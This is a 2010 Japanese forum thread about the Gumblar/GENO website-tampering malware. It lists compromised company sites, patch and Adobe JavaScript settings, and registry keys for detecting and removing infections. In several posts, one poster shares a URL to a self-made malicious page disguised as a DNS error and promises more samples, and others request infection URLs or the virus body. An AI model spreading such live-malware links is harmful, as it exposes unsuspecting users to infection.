697名無しさん@お腹いっぱい。:2010/01/08(金) 15:16:11
>>693
そりゃあ、今踏んだって何も起こらなくて当然。
698名無しさん@お腹いっぱい。:2010/01/08(金) 15:21:48
>>694を素直に読むと、IEの保護モード有効下だとAdobe脆弱性回避できるように思えるけど実際は違うよな?
699名無しさん@お腹いっぱい。:2010/01/08(金) 15:22:40
他サイトに飛ぶときに警告を出せば済む話だろう
2ちゃんを見習え
700名無しさん@お腹いっぱい。:2010/01/08(金) 15:28:22
>>694

>>99
99 :名無しさん@お腹いっぱい。:2009/12/28(月) 08:37:05
何か役に立つかもしれないので報告

fxwill●comにウイルスがあると聞き試しに見てみた(←阿呆)
/*GNU GPL*/〜というコードが埋め込まれてたっぽい

サイトを開くと
このファイルの実行を許可しますか?というウインドウが出てきて(VISTA)
「キャンセル」を押しても再度同じウインドウが表示
何度押しても同じでそのうち画面が固まる

(以下略)



これってつまり、IE保護モードで今回のリスクは回避されないんじゃね?
701名無しさん@お腹いっぱい。:2010/01/08(金) 15:30:21
保護モードは一部回避可能だけど、
Flashの脆弱性を狙うコードが保護モード回避したとかの話は聞いたこと無い
テストコードは出ても、実際にそれを使ったマルウェア等は出てない
702名無しさん@お腹いっぱい。:2010/01/08(金) 15:30:29
感染実験したいからURLくれ
703名無しさん@お腹いっぱい。:2010/01/08(金) 15:34:25
>>696
そこ見ても、保護モードのシステムの管理下で動作するだけで、
勝手にシステムとかに書き込めるわけじゃないじゃん
704名無しさん@お腹いっぱい。:2010/01/08(金) 15:42:33
>>694
>Adobe Readerの脆弱性攻撃は、「ChangeLog.pdf」というPDFファイルの中に
>複数の攻撃コードが組み込まれており、パソコンにAdobe Readerがインストールされている場合には、
>この細工されたPDFファイルを自動的に開いて攻撃を行う。


↑保護モードでは通過してしまうプロセスを悪用してるんじゃないのかと
705名無しさん@お腹いっぱい。:2010/01/08(金) 16:02:33
>>脆弱性でやられてもまず影響が出ない
そういえばJavaがウイルスのローダーとして悪用されていた件
脆弱性以前の問題だよね・・・
706名無しさん@お腹いっぱい。:2010/01/08(金) 16:22:12
もうどんな防御しようと無意味なんじゃないかって思えてきた
707名無しさん@お腹いっぱい。:2010/01/08(金) 16:24:38
OSなりブラウザを仮想化すれば良いではないか
708名無しさん@お腹いっぱい。:2010/01/08(金) 16:28:59
そういう手段しか思いつかないレベルってことですね
709名無しさん@お腹いっぱい。:2010/01/08(金) 16:33:53
>>706-708
NO

Adobeがちゃんと脆弱性塞いでれば良いだけの話
もっと言えばMSが情報公開して協力してれば良いだけの話
攻撃自体は単純
710名無しさん@お腹いっぱい。:2010/01/08(金) 16:35:30
警視庁も動きだしたそうじゃないか
どこまでできるのかわからんけど
711名無しさん@お腹いっぱい。:2010/01/08(金) 16:37:16
>>709
>MSが情報公開して協力
誰に?
712名無しさん@お腹いっぱい。:2010/01/08(金) 16:38:20
>>711
Adobeに
713名無しさん@お腹いっぱい。:2010/01/08(金) 16:46:25
JavaもReaderもアンインストール
WindowsとFlashは最新
ばっちこいや
714名無しさん@お腹いっぱい。:2010/01/08(金) 16:51:55
>>713
最終ステップ:Windowsもアンインストール
715名無しさん@お腹いっぱい。:2010/01/08(金) 16:54:29
Web サイト改ざんに関する情報提供のお願い
ttp://www.jpcert.or.jp/pr/2010/pr100001.txt
716名無しさん@お腹いっぱい。:2010/01/08(金) 17:09:01
WIN7は感染しないんですか?
717名無しさん@お腹いっぱい。:2010/01/08(金) 17:21:20
ゲームやケータイのブラウザが最強だな
感染する場所がありゃしないぜ!
718名無しさん@お腹いっぱい。:2010/01/08(金) 17:22:16
もうみんなでマカーになろうよ
719名無しさん@お腹いっぱい。:2010/01/08(金) 17:34:42
つlinux
720名無しさん@お腹いっぱい。:2010/01/08(金) 17:38:33
凄い初心者な質問で申し訳ないけど
普段から使ってるもの一通り最新版にしておけばGumblarに限らず
大体のウイルスにかからないもんなの?
721名無しさん@お腹いっぱい。:2010/01/08(金) 17:42:15
さきほどGENOウィルスが仕込まれてる可能性の高いURLを踏んでしまいました。
慌てて途中でブラウザを閉じたのですが感染してるか心配です。
こちらの(http://www29.atwiki.jp/geno/)GENOウイルスまとめサイトに書かれていた方法を確認し
感染の可能性は低いと判断しましたが、このサイトの情報は古いと書いてあったので
本当に無事なのかちょっと心配です。
上記サイトに書かれている方法以外に感染を判断する方法はありますか?
722名無しさん@お腹いっぱい。:2010/01/08(金) 17:46:26
>>720
古いバージョンの脆弱性を狙うタイプのウイルスは防げるかと思われ

それ以外にも例えばAdobeReaderのjsOFFみたいな機能設定に関する脆弱性とか、
そもそも実行型ファイルを開いて感染する場合もあると思うけども
723名無しさん@お腹いっぱい。:2010/01/08(金) 17:47:13
>>720
一通り最新版にして適切な設定にしていれば助かる可能性は高くなる
なんでもかんでも自動実行されるPCだとGumblarに限らず危険って事
724名無しさん@お腹いっぱい。:2010/01/08(金) 17:49:41
>>709
Adobeの対応悪すぎだよな。
過去のMicrosoftと同じ過ちを繰り返してる。
みんな歴史に学べないねぇ。
725名無しさん@お腹いっぱい。:2010/01/08(金) 17:51:14
>>720
新型はふせげねー、新型にあたったらクリーンインストールするしかない
726名無しさん@お腹いっぱい。:2010/01/08(金) 17:51:38
やっとAdobeの修正がきたみたいだね
ttp://internet.watch.impress.co.jp/docs/news/20100108_341267.html
727名無しさん@お腹いっぱい。:2010/01/08(金) 17:53:01
来週の話でしょ。
対応遅すぎ。
728名無しさん@お腹いっぱい。:2010/01/08(金) 17:54:32
なんでそんな悠長に構えてんだろうなアドビ
自分とこの製品が犯罪に利用されてるってのに
729名無しさん@お腹いっぱい。:2010/01/08(金) 17:56:43
AdobeReaderもFlashPlayerもJREも、
常に最新版に更新って言っても実際に更新かかるまでには微妙にタイムラグあるよな。
つまり、アップデートに気を使ってた場合でも、
最新版になる前にたまたま感染サイト踏んでたらアウトだよな。
730名無しさん@お腹いっぱい。:2010/01/08(金) 17:57:04
競合相手がいないからさ
731名無しさん@お腹いっぱい。:2010/01/08(金) 17:59:09
>>720
感染しているPCはCPU使用率が異常に高いのも目安のひとつだな
732名無しさん@お腹いっぱい。:2010/01/08(金) 17:59:23
サイト改ざんリスト(発表分のみ)
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2113

三栄コーポレーション
サイバーエージェント
ハウス食品
東京財団
データリンクス
京王電鉄
ビロング
恵那バッテリー電装
ナショナルクリエイターズカンファレンス
大学図書館問題研究会
モロゾフ
民主党東京都総支部連合会
ローソン
検索エンジンMooter
デジタルマガジン
ディズニー
信越放送
FX為替情報検索「fxwill.com」
野村ビルマネジメント
京成トラベルサービス
本田技研工業
JR東日本
ラジオ関西


しかし、とんでもねー数だな…
733名無しさん@お腹いっぱい。:2010/01/08(金) 18:02:14
adobeもアレだけど感染した企業のセキュリティに対する認識の甘さも問題だな
734名無しさん@お腹いっぱい。:2010/01/08(金) 18:02:32
735名無しさん@お腹いっぱい。:2010/01/08(金) 18:02:43
736名無しさん@お腹いっぱい。:2010/01/08(金) 18:02:49
CVE-2009-4324

VRT: Adobe Reader media.newPlayer() Analysis (CVE-2009-4324)
ttp://vrt-sourcefire.blogspot.com/2009/12/adobe-reader-medianewplayer-analysis.html

extraexploit: Adobe CVE-2009-4324 in the wild - (0day) - part 0-6
ttp://extraexploit.blogspot.com/search?q=CVE-2009-4324
737名無しさん@お腹いっぱい。:2010/01/08(金) 18:04:25
>>732
ここらのサイトやアメブロなんかで気づかずに感染してる一般人って相当数いるんじゃね?
今回のは自分が感染してるかどうか分からないみたいだし…
738名無しさん@お腹いっぱい。:2010/01/08(金) 18:05:29
>>732
ネズミーもか!?
閲覧者多そうだしますますやばいな
739名無しさん@お腹いっぱい。:2010/01/08(金) 18:09:37
>>721
一応他スレから転載

437 :8080:2010/01/08(金) 18:03:07 ID:Db0zlWvOO
>>435
旧Gumblarのやつは使えない。


【感染確認方法】
msconfigでスタートアップにsiszyd32.exeとTMD.tmpがあったらご愁傷様(感染確定)

削除はネットワークから切り離して、セーフモードで起動させ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
削除
※sysgif32で検索

C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
ファイルを削除


*感染していた場合*
駆除するより、バックアップを取ってから
リカバリ(クリーンインストール)を強く推奨。
740名無しさん@お腹いっぱい。:2010/01/08(金) 18:09:37
>>732
ディズニー見ちゃったよ
いつの時点で改ざんされてたんだろう
741名無しさん@お腹いっぱい。:2010/01/08(金) 18:10:19
>>737-738
リンク先読めばわかるけど、大体の企業は
「特定のページがやられてて、それ以外は今のところ異常ない」って建前らしい。

まあ、ウイルスの全貌が解析されきってない以上
実際のところはどうだかわかったもんじゃないけどね。
742名無しさん@お腹いっぱい。:2010/01/08(金) 18:11:01
>>740
リンク先に詳しく書いてある。
743名無しさん@お腹いっぱい。:2010/01/08(金) 18:14:29
>>742
Forbiddenってなる
744名無しさん@お腹いっぱい。:2010/01/08(金) 18:15:51
>>732

>■検索エンジンMooter(2009年12月30日発表)
>種別:/*GNU GPL*/
>期間:2009年12月25日1時〜12月28日18時30分
>場所:Mooterホームページ(*.mooter.co.jp)、および「Mooter検索窓」の設置サイト
>告知:弊社ホームページの改ざんについてのお詫びとお知らせ(削除済み)

こことか地味に酷くね?
検索窓設置してるサイトもやられてるとしたら、どこまで広がってるか…
しかも告知「削除済み」とか対応がありえねえだろ。
745名無しさん@お腹いっぱい。:2010/01/08(金) 18:15:55
>>743
は?
746名無しさん@お腹いっぱい。:2010/01/08(金) 18:16:52
■ディズニー(2009年12月29日発表)
種別:Gumblar.x
期間2009年12月22日16時〜12月25日18時
場所:ショッピングサイト お正月特集ページ(www.disney.co.jp/shopping/special/0912_newyear.html)
告知:お正月特集ページに関するお詫び
http://www.disney.co.jp/shopping/pop/091229_info.html

しょうがないやつだ。念のためおまえのPCはクリーンインストールして来い
747名無しさん@お腹いっぱい。:2010/01/08(金) 18:17:40
>>743

>■ディズニー(2009年12月29日発表)
>種別:Gumblar.x
>期間2009年12月22日16時〜12月25日18時
>場所:ショッピングサイト お正月特集ページ(www.disney.co.jp●shopping/special/0912_newyear.html)
>告知:お正月特集ページに関するお詫び
>www.disney.co.jp●shopping/pop/091229_info.html
748名無しさん@お腹いっぱい。:2010/01/08(金) 18:18:27
>>743
■ディズニー(2009年12月29日発表)
種別:Gumblar.x
期間2009年12月22日16時〜12月25日18時
場所:ショッピングサイト お正月特集ページ(www.disney.co.jp/shopping/special/0912_newyear.html)
告知:お正月特集ページに関するお詫び
ttp://www.disney.co.jp/shopping/pop/091229_info.html
749名無しさん@お腹いっぱい。:2010/01/08(金) 18:19:16
750名無しさん@お腹いっぱい。:2010/01/08(金) 18:20:54
でもまぁ、
(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する

の対策が取れてたら感染サイト踏んでたとしても大丈夫なはずだが一応
751名無しさん@お腹いっぱい。:2010/01/08(金) 18:21:11
>>746-748
わざわざすいません
該当する期間とショッピングサイトには行っていないから
なんとかセフセフ
752名無しさん@お腹いっぱい。:2010/01/08(金) 18:23:48
New谷さん大丈夫かね

748 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2010/01/08(金) 18:18:27
>>743
■ディズニー(2009年12月29日発表)
種別:Gumblar.x
期間2009年12月22日16時〜12月25日18時
場所:ショッピングサイト お正月特集ページ(www.disney.co.jp/shopping/special/0912_newyear.html)
告知:お正月特集ページに関するお詫び
ttp://www.disney.co.jp/shopping/pop/091229_info.html
753名無しさん@お腹いっぱい。:2010/01/08(金) 18:24:12
>>750
http://pc11.2ch.net/test/read.cgi/sec/1259607683/405
今北さん用、GENO(Gumblar)ウイルス対処法。

行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。

(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する

(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。

(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す
754名無しさん@お腹いっぱい。:2010/01/08(金) 18:25:05
もともとスクリプトを検出していたのは少ない
win.jpgなどの脆弱性を突いた攻撃自体を検出した方が効率的だろ
脆弱性攻撃を受けた後実行されるpdfupf.exeだけを検出すものもあるがこれでも防御は可能
755名無しさん@お腹いっぱい。:2010/01/08(金) 18:26:28
>>739の感染確認方法ってどうなの?
756名無しさん@お腹いっぱい。:2010/01/08(金) 18:27:45
現時点じゃ他に確認のしようがない
757名無しさん@お腹いっぱい。:2010/01/08(金) 18:28:11
「New谷さん」呼びはやめろよな
758名無しさん@お腹いっぱい。:2010/01/08(金) 18:30:20
>>755
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
の部分は新しいやつで
"~TM6.tmp"="C:\\WINDOWS\\TEMP\\~TM6.tmp"
に変わってる
しかし同じような名前なのですぐ気づく
これからも変わるかも知れないが変な物が登録されているかはすぐ分かるだろう
759名無しさん@お腹いっぱい。:2010/01/08(金) 18:34:06
>>758
詳しくありがとうございます
760752:2010/01/08(金) 18:37:49
ごめん誤爆だった
761名無しさん@お腹いっぱい。:2010/01/08(金) 18:40:31
このあいだfirefox NoScript+view-source:で
感染サイトのソース見ようとしたらavast!がプゥプゥいった。
この状況でも感染するもの?
adobeのjavaはオフにしてある。
762名無しさん@お腹いっぱい。:2010/01/08(金) 18:40:40
糸色望した
763名無しさん@お腹いっぱい。:2010/01/08(金) 18:42:29
>>761
その場合はNoScriptでブロックされているはず
問題ない

>adobeのjavaはオフにしてある。
Tips:JavaとJavaScriptは別物
764名無しさん@お腹いっぱい。:2010/01/08(金) 18:48:29
view-sourceだけでも安全な気がしてたんだが・・・
違うのね
765名無しさん@お腹いっぱい。:2010/01/08(金) 18:49:05
安全だよ
766名無しさん@お腹いっぱい。:2010/01/08(金) 18:49:37
txtとして開くんだから大丈夫じゃないの?
767名無しさん@お腹いっぱい。:2010/01/08(金) 18:52:52
txt形式でもウイルスのコード記述があれば反応するのでは
感染はしないけど
768名無しさん@お腹いっぱい。:2010/01/08(金) 18:52:58
>>763ありがとう
ていうかview-source:ってリンク先のサイト踏まずに
ソースがみれるものだと思ってたんだがウイルスは防げないのか…
オンラインソースチェッカー閉鎖が惜しまれる
769名無しさん@お腹いっぱい。:2010/01/08(金) 18:54:52
オンラインソースチェッカーの代わりに
http://www.aguse.jp/
じゃだめなのか?
770名無しさん@お腹いっぱい。:2010/01/08(金) 18:55:57
>>768
見れると思うけど
>>550
ttp://www.aguse.jp/
771名無しさん@お腹いっぱい。:2010/01/08(金) 18:57:21
初心者で申し訳ないんだけど、>>753の(1)〜(4)に加えて
IEでセキュリティ高にしたり、firefox+NoScript使えばさらに安全になるのかな?
772名無しさん@お腹いっぱい。:2010/01/08(金) 18:57:43
>>710
モロゾフの人がFTPログを証拠として被害届けを出したそうですね
でもあれは不正アクセスの証明にしかなりませんね

モロゾフの人健忘症なのでしょうかね
自身が加害者であることは伝えてあるのですが
対応が駄目駄目です

>モロゾフの人
首吊って氏んだ方がいいとおもいますよ
773名無しさん@お腹いっぱい。:2010/01/08(金) 18:58:48
ttp://www.aguse.jp/
ってソースどこに表示されるの?
ホストだとかドメインだとかは出てくるんだけど
774772EM114-48-42-165.pool.e-mobile.ne.jp:2010/01/08(金) 19:01:01
>モロゾフの人
文句があったらかかってきなさい

-o_japan-オルティスジャパンー
775名無しさん@お腹いっぱい。:2010/01/08(金) 19:02:20
>>773
調べたいサイトのURLを入力してクリック
結果のページ右のスクリーンショット(クリックすると拡大します)これで見られます
776名無しさん@お腹いっぱい。:2010/01/08(金) 19:02:22
飛び先チェック
http://kakiko.com/check/sample.html
777名無しさん@お腹いっぱい。:2010/01/08(金) 19:03:23
更新するものは最新版に更新して、
Adobe Reader、JRE、QuickTimeとか大して使わないものはアンインストール
Adobe Readerなんて他の無料で軽いの使えばいいんだし
これが一番の防御策だね
778名無しさん@お腹いっぱい。:2010/01/08(金) 19:03:30
>>775
ゴメンこれはサイトを見たいときね
779sage ◆sage/xLnlI :2010/01/08(金) 19:09:32
>>702
検体(コードが書いてあるやつ)いるならあげる
うpできるかわからないけど
780名無しさん@お腹いっぱい。:2010/01/08(金) 19:09:48
>>776
これ知らなかった
ありがとう
781名無しさん@お腹いっぱい。:2010/01/08(金) 19:12:39
ドクター中松さんのサイトは修正済みみたいだね
782名無しさん@お腹いっぱい。:2010/01/08(金) 19:17:18
>>159
ここはまだだね
いつの間にかLGPLに変わってるし
783名無しさん@お腹いっぱい。:2010/01/08(金) 19:18:42
>>738
なんで馬鹿みたいにネズミーとか言うんだろ
長くてみんどくさいならTDLとかでいいじゃん
何かスゲーむかついたので
>ネズミー
784名無しさん@お腹いっぱい。:2010/01/08(金) 19:19:11
>>782
どういう人かと思って検索したら驚いた
785名無しさん@お腹いっぱい。:2010/01/08(金) 19:20:42
>>783
いちいち言わなくて良いよ
786名無しさん@お腹いっぱい。:2010/01/08(金) 19:21:01
>>782
LGPLだね
元がどうだったか知らないけど
787名無しさん@お腹いっぱい。:2010/01/08(金) 19:37:29
このブラウザ使えるかもしれん
ttp://www.scriptbrowserk.com/

コンテンツブロックに*:8080/*を放り込m(ry
788名無しさん@お腹いっぱい。:2010/01/08(金) 19:45:43
「GNU(ぐぬー)たん」
お馴染みのヌーを萌擬人化したキャラ

誰か・・・描いて・・・
789名無しさん@お腹いっぱい。:2010/01/08(金) 19:50:47
>>773
右上のスクリーンショットの下からいけるGatewayへ。
上のフレームにある「ソース表示」でソースを持ってこれる。
だから、最初からGatewayに行ったらいいんじゃないかな。
ttp://gw.aguse.jp/
逆に、ここからaguseに行くことも可能(フレームの「ウェブ調査」)。
790名無しさん@お腹いっぱい。:2010/01/08(金) 20:12:15
ノートンは対応してないのか・・・
>>739の方法で調べて
スタートアップにsiszyd32.exeとTMD.tmpの両方なかったら
この手のウイルスには感染していないでFA?
感染してないと思うけど気になるので
791名無しさん@お腹いっぱい。:2010/01/08(金) 20:13:10
朝刊の一面になるほどのニュースなのに
対策していない企業とかマジでありえない
対策していないネットユーザにも責任はあるが
そのままWEBサイトを放置している企業の責任は重大
792名無しさん@お腹いっぱい。:2010/01/08(金) 20:19:08
>>790
ノートンは脆弱性保護で最初から対応してる
今はファイルも検出する
793名無しさん@お腹いっぱい。:2010/01/08(金) 20:21:30
>>159
こちらがまだだったのでVPCで踏んでみた。
特に何も起こらない・・・

フラッシュのバージョンが10.0.42.34だと影響ないということ?
794名無しさん@お腹いっぱい。:2010/01/08(金) 20:22:27
>>792
ありがとう、少し安心した
795名無しさん@お腹いっぱい。:2010/01/08(金) 20:23:21
>>793
Flashは関係ない
796名無しさん@お腹いっぱい。:2010/01/08(金) 20:24:43
>>794
感染が気になるならスタートアップ確認でOK
さらに言えばタスクマネージャーで確認
797790:2010/01/08(金) 20:31:54
>>796
タスクマネージャーにもmsconfigで見たスタートアップにも
siszyd32.exeとTMD.tmpは影も形もなかったよ、よかった
みんな教えてくれてありがとう
798名無しさん@お腹いっぱい。:2010/01/08(金) 20:35:03 BE:1098795874-2BP(7777)
>>797
早い話
オンラインスキャン汁
799名無しさん@お腹いっぱい。:2010/01/08(金) 20:37:35
オンラインスキャンしたところで検出できるやつがなかったりするからな
800名無しさん@お腹いっぱい。:2010/01/08(金) 20:41:04
>>799
オワタ\(^o^)/

今でも(´・ω・) スクリプトが埋め込まれているうrlplz
801名無しさん@お腹いっぱい。:2010/01/08(金) 20:51:06
Quick Time ですけど、QuickTime Alternativeはどうなんでしょ?入れて置いてもいいの?
アホな質問しているのかしら…。
802名無しさん@お腹いっぱい。:2010/01/08(金) 21:02:06
>>783
TDLのガイドライン・・・
803sage ◆sage/xLnlI :2010/01/08(金) 21:08:21
>>800
おk
うpしてくる(自分のサイトに)
804名無しさん@お腹いっぱい。:2010/01/08(金) 21:13:00
>>803
お前はさっきから何がしたいんだ?
805sage ◆sage/xLnlI :2010/01/08(金) 21:13:40
http://www16.atpages.jp/filedl/dnserror.html

検体的なもの(アクセスすると危険)
806名無しさん@お腹いっぱい。:2010/01/08(金) 21:18:10
>>805
エラーにみせかけるとな?
鬼畜ですな
807名無しさん@お腹いっぱい。:2010/01/08(金) 21:27:28
>>805
/*GNU GPL*/
808名無しさん@お腹いっぱい。:2010/01/08(金) 21:33:55
>>805
カスペルスキー無反応
win7
firefox カスペルスキー仮想実行モード
809ZK000167.ppp.dion.ne.jp sage ◆sage/xLnlI :2010/01/08(金) 21:41:15
>>808
それやばい
810ZK000167.ppp.dion.ne.jp sage ◆sage/xLnlI :2010/01/08(金) 21:43:09
>>806
エラー画面をみて思いつきましたw
811名無しさん@お腹いっぱい。:2010/01/08(金) 21:45:22
まいど。
ttp://www.okamoto.co.jp/
KIS2010で検出。
812名無しさん@お腹いっぱい。:2010/01/08(金) 21:47:22
新ウイルスに対応したオンラインスキャナーないのかよ・・・
アンチウイルスソフトをインスコするたびにBSOD祭りの俺はどうすれば・・・
813名無しさん@お腹いっぱい。:2010/01/08(金) 21:51:26
>>811


Kaspersky
Internet Security 2010
アクセスが禁止されました
要求されたURLのWebページを表示できません

URL:

>>811

このWebページはウイルスに感染しています

次のウイルスが見つかりました: Trojan-Downloader.JS.Agent.ewo
情報:
21:50:29
Kaspersky Internet Security 2010
814ZK000167.ppp.dion.ne.jp sage ◆sage/xLnlI :2010/01/08(金) 21:52:22
>>812
なにそれこわい
明日は京都は違う検体をupします
種類も変えます(明日も鬼畜なやつにしようwwwwwwフヒッwwwwwww)


upの仕方

コードを書いてtxtに

up

txtをhtmlに書き換え

ヽ('A`)ノ 完成!
 (  )
 ノω|
815名無しさん@お腹いっぱい。:2010/01/08(金) 21:53:47
816ZK000167.ppp.dion.ne.jp sage ◆sage/xLnlI :2010/01/08(金) 21:54:29
>>811
なにも起こらない  当たり前だけど
(pspで2ch北から)
817ZK000167.ppp.dion.ne.jp sage ◆sage/xLnlI :2010/01/08(金) 21:56:13
検体upは仮装pcから←オヌヌメ
818名無しさん@お腹いっぱい。:2010/01/08(金) 21:57:26
>>817
最近のウイルスはホストOSまで影響を与えるらしいよ(そよっ
819名無しさん@お腹いっぱい。:2010/01/08(金) 21:58:57
仮想PCだから安心なんてのは幻想にすぎんよ
820名無しさん@お腹いっぱい。:2010/01/08(金) 22:07:53
>>811
こういうのは2chブラウザビューアで見ても感染しない?
821名無しさん@お腹いっぱい。:2010/01/08(金) 22:09:11
>>820
winマシンで見る限り絶対安心とは言えない
822名無しさん@お腹いっぱい。:2010/01/08(金) 22:10:08
>>817
押入れから古いPC(HDD無)引っ張り出して
KNOPPIX(DVD)+USBメモリマウント
823名無しさん@お腹いっぱい。:2010/01/08(金) 22:12:44
http://www.copper-brass.gr.jp/

日本伸銅協会
824名無しさん@お腹いっぱい。:2010/01/08(金) 22:14:12
>>777
Adobe互換ソフトも必ずしも安全ではないと何度言えば
825sage ◆sage/xLnlI :2010/01/08(金) 22:14:12
>>818
( ゚д゚)

(つд⊂)ゴシゴシ

(;゚д゚)

(つд⊂)ゴシゴシ
  _, ._
(;゚ Д゚) …?!

( ゚д゚ )フラグビンビン[ピー]ビンビン
826名無しさん@お腹いっぱい。:2010/01/08(金) 22:15:46
>>812
まずはOSの入れなおしからどうぞ
827名無しさん@お腹いっぱい。:2010/01/08(金) 22:17:09
もうこうなると、まだ無事なサイト上げた方が早い気すらしてくる
828sage ◆sage/xLnlI :2010/01/08(金) 22:18:14
ホストpcスペック
OS windows7
メモリー 4GB
CPU AMD アスロン64X2 2.7GHz
ADOBE 8.12
flash 最新
JRE ? 12
829名無しさん@お腹いっぱい。:2010/01/08(金) 22:20:24
他はともかく、JREはアンインスコしとけば他のウィルス対策にもなるから
アンインスコしない手はない
830名無しさん@お腹いっぱい。:2010/01/08(金) 22:20:41
>>826
ウイルス踏んでもいないのにクリーンインストールかよ・・・
アレなんだよ・・・NICのドライバと競合して入れられない俺のマシン
アンチウイルスと犬猿の仲・・・
831sage ◆sage/xLnlI :2010/01/08(金) 22:43:00
>>829
俺はJREがないと2chが見れませんので無理でつ
832名無しさん@お腹いっぱい。:2010/01/08(金) 22:54:18
>>830
ドライバソフトの更新ないの?
833名無しさん@お腹いっぱい。:2010/01/08(金) 22:58:13
>>832
最近更新されていないお・・・
バージョンを色々と変えてみたが・・・ムリポ
834名無しさん@お腹いっぱい。:2010/01/08(金) 22:59:21
>>823
あれ、教えてもずっと放置してたのにいつの間にかサーバ落としたのか
835名無しさん@お腹いっぱい。:2010/01/08(金) 23:02:57
>>834
ここ見てたんですかねぇ。。。
836名無しさん@お腹いっぱい。:2010/01/08(金) 23:10:45
ウイルスに感染できるうrlplz
837名無しさん@お腹いっぱい。:2010/01/08(金) 23:26:13
>>717
ケータイに感染するウィルスなかったっけ
838名無しさん@お腹いっぱい。:2010/01/08(金) 23:31:36
「日本伸銅協会」をヤフで検索、キャッシュのソース内にしっかりと/*GNU GPL*/がwww
839名無しさん@お腹いっぱい。:2010/01/08(金) 23:42:19
http://www.okamoto.co●jp/js/over.js

/*LGPL*/ ですね
840名無しさん@お腹いっぱい。:2010/01/08(金) 23:53:34
危ないURLを踏んでみたが感染しなかったwww
俺最強
841名無しさん@お腹いっぱい。:2010/01/08(金) 23:54:37
『蜂の家』でググって一番上のサイトはまだ感染してるのかな
842名無しさん@お腹いっぱい。:2010/01/08(金) 23:58:01
このウイルスって2度目のアクセスは感染させるためのページ表示させない仕様なのかな?
843名無しさん@お腹いっぱい。:2010/01/08(金) 23:58:46
アプリケーションの追加と削除にJAVAの旧バージョンが10個位あったんだけど影響とかあるの?
844名無しさん@お腹いっぱい。:2010/01/09(土) 00:01:55
javaなんてほとんど使い道ないから全部消した方が安心
845名無しさん@お腹いっぱい。:2010/01/09(土) 00:04:34
お絵かきチャットできなくなっちゃう!><
846名無しさん@お腹いっぱい。:2010/01/09(土) 00:05:04
今日の会社のお年寄りの会話
おっさんA「ガンプラって怖いらいな、HP見ただけで・・・」
おっさんB「ブログ見ただけでも感染するって書いてあるぞ・・・」


もれ心の中で「それ、ガンプラじゃなくてガンブラーだから・・・
       しかも、仕事中にどんなところ覗いているんだよ・・・おっさんども。」
847名無しさん@お腹いっぱい。:2010/01/09(土) 00:11:23
Java消したらEclipse使えないじゃん
848名無しさん@お腹いっぱい。:2010/01/09(土) 00:12:14
誰かウイルス本体を上げてくれ
ttp://ux.getuploader.com/virus/
849名無しさん@お腹いっぱい。:2010/01/09(土) 00:23:37
>>744
鳩山首相のtwitter偽アカウントやってたメガネ王という人のブログにmooterのブログパーツがあって、
年末ちょっと騒動になった
850名無しさん@お腹いっぱい。:2010/01/09(土) 00:45:47
インターネットに公開してる企業のサイトは、
セキュリティのきっちりしたデータセンターに鯖が置いてあって、
更新時なんかは許可された端末からのみVPN経由でできるよう
にしてあるのが常識だと思ってたんだけど、意外とみんなそうじゃないんだね・・・
851名無しさん@お腹いっぱい。:2010/01/09(土) 00:55:48
そんなところはほとんどないだろ
852名無しさん@お腹いっぱい。:2010/01/09(土) 00:57:53
社内セキュリティ>サイト
853名無しさん@お腹いっぱい。:2010/01/09(土) 01:22:32
>>850
それやってもやられるものはやられる
854名無しさん@お腹いっぱい。:2010/01/09(土) 01:32:40
>>847
そうそう
JREのバージョンを上げるって対策だけはおいそれと出来ないから困ってる
855名無しさん@お腹いっぱい。:2010/01/09(土) 01:35:38
>>854
色々不具合が起きるケースが多いわな、確かに。
856名無しさん@お腹いっぱい。:2010/01/09(土) 01:36:43
わかります、戸松遥,中島愛,早見沙織なわけですね
857名無しさん@お腹いっぱい。:2010/01/09(土) 02:00:56
変則的だけど、インストーラは別だからシステムに影響するJREは最新にして
JDK側は開発に合わせるとかもできなくもない気がする
試してないけどね

お絵かきしたい人は諦めてくれ
858名無しさん@お腹いっぱい。:2010/01/09(土) 02:09:23
Web サイト改ざんに関する情報提供のお願い
ttp://www.jpcert.or.jp/pr/2010/pr100001.txt

インシデントの届出
ttps://form.jpcert.or.jp/

記入例
ttp://www.jpcert.or.jp/pr/2010/form.png
結構適当でいいらしい。
859名無しさん@お腹いっぱい。:2010/01/09(土) 02:44:26
>>844
JAVAのバージョンチェックしたらJAVAそのものが入っていなかったでござる
860名無しさん@お腹いっぱい。:2010/01/09(土) 03:01:00
噴いたwww
861名無しさん@お腹いっぱい。:2010/01/09(土) 03:02:43
>>859
あれ? 俺書いたっけ・・・
とりあえずJAVA入れてきたw
862名無しさん@お腹いっぱい。:2010/01/09(土) 03:03:16
>>732見たけど
■三栄コーポレーション(2010年1月8日発表)
告知:「モッフル」ホームページの改ざんとウイルス被害に関する報告とお詫び[PDF]

いま出すお詫びがPDFでなくてもよかろうもん
863名無しさん@お腹いっぱい。:2010/01/09(土) 03:25:32
>>861
なかったもんをなぜわざわざ入れるのだ
864名無しさん@お腹いっぱい。:2010/01/09(土) 03:54:58
サイバー/サーバー/サバイバー(なんかキワモノバンドの名前になりそうな)

